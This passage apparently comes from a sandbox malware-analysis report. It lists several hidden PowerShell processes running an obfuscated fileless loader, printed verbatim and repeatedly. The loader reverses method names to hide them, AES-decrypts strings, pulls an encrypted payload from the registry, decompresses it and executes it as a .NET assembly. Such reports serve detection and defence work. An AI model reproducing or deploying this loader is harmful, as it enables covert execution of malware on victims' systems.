[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        
        PID:9048
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        Hide Artifacts: Hidden Window
        
        PID:7600
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        
        PID:7860
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = 